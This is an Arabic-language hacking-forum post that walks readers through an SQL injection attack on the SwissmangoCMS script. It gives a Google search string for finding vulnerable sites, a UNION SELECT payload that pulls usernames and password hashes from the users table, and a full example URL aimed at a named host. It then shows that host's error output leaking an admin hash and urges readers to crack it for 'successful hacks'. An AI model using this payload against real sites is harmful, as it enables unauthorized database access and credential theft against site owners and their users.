:: vBspiders Professional Network :: - ثغرة في سكربت SwissmangoCMS

السلام عليكم اخوتي العناكب اليوم انشاء جئت لكم بثغرة جديدة
نبدا بسم الله
ندخل موقع قوقل

www.google.com

نقوم بالبحث عن

كود PHP:

   inurl:/index.php?main=

الاستغلال

كود PHP:

   666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--

مثال

كود PHP:

   http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws

(0x3a,userName,userPass)+from+users--

وطلع لنا الاتي

كود PHP:

   SELECT navParent FROM navigation WHERE navID = admin:1a1dc91c907325c69271ddf0c944bc72

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':1a1dc91c907325c69271ddf0c944bc72' at line 1

يعني ان المعلومات هكذا
admin:1a1dc91c907325c69271ddf0c944bc72
ماعليك الا فك الهاش واختراقات موفقة

الموضوع اصلي : الشبكة العنكبوتية الاحترافية نرجو حفظ الحقوق